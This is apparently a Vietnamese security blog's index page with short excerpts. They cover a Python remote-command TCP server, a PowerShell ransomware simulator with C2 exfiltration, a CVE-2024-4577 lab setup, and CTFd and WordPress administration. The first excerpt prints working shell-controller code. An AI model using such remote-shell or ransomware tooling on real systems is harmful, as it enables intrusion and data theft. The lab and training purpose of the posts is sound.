Tcp Connection và tùy chỉnh giả lập

syvtitLeave a Comment on Tcp Connection và tùy chỉnh giả lập

1. Viết Tcp Connection đơn giản với Python tcpServer.py tcpClient import socketdef connect():    s = socket.socket()    s.bind((“0.0.0.0”,12345))    s.listen(1)    conn , addr = s.accept()    print(‘[+] We got a connection from’, addr)    while True:        command = input(“Shell> “)        if ‘terminate’ in command:            conn.send(‘terminate’.encode())            conn.close()            break        else:            try:                conn.send(command.encode())                print(conn.recv(4096).decode())            except ValueError as ve:                print(ve)connect() import socketimport subprocess def […]

Continue Reading

PSRansom

syvtit

Đây là một công cụ giúp bạn mô phỏng quá trình mã hóa của một ransomware trong hệ thống sử dụng powershell, cùng với đó là khởi tạo kết nối đến C2 server để gửi dữ liệu. Tham khảo thêm tại link sau: Sau đây là cách thức thực hiện: B1: Dựng C2 Server, ở […]

Continue Reading

Cài đặt CTFd

syvtitLeave a Comment on Cài đặt CTFd

B1: Cài đặt docker với câu lệnh sudo apt install docker.io B2: Cài đặt Docker compose (vì có thử với docker standalone hay phát sinh lỗi, nên ở đây mình sẽ sử dụng docker compose plugin) Tham khảo trên link: https://docs.docker.com/compose/install/linux/ B3: Clone từ CTFd từ github về git clone https://github.com/CTFd/CTFd.git B4: Tạo file .ctfd_secret_key […]

Continue Reading

Cài đặt Nginx & PHP & WorkPress trên Ubuntu – 6. Dự phòng hệ thống

syvtitLeave a Comment on Cài đặt Nginx & PHP & WorkPress trên Ubuntu – 6. Dự phòng hệ thống
This entry is part 7 of 7 in the series Cài đặt Nginx & PHP & WorkPress trên Ubuntu

Mục đích trong bài viết này của mình là để tạo ra một máy chủ ảo hóa ở on-premise và sync toàn bộ dữ liệu từ máy chủ đang chạy, nhằm mục đích trong trường hợp có lỗi xảy ra trên máy chủ đang chạy thì dữ liệu và hệ thống mới sẽ sẵn sàng […]

Continue Reading

CVE-2024-4577

syvtit

1. Dựng máy chủ có lỗ hổng CVE-2024-4577 B1: trong tình huống bài lab này mình sẽ sử dụng windows server 2022 standard để dựng máy chủ B2: Chuyển đổi system locale sang (Traditional Chinnese, Simplified Chinese hoặc Japanese). Trong bài lab này mình sẽ chuyển sang Japanese B3: Cài đặt Xampp với phiên bản […]

Continue Reading

3. Giảm thiểu rủi ro trong hệ thống (Reducing your identified Attack Surface Risk)

syvtit
This entry is part 3 of 3 in the series Attack Surface Risk Management (ASRM)

Trend Micro Vision One cũng giúp các CISO hoặc nhà phân tích bảo mật bằng cách cung cấp các biện pháp khắc phục mà có thể triển khai để giảm thiểu chỉ số rủi ro bề mặt tấn công trong hệ thống. Các biện pháp khắc phục này được cung cấp trong giao diện tại […]

Continue Reading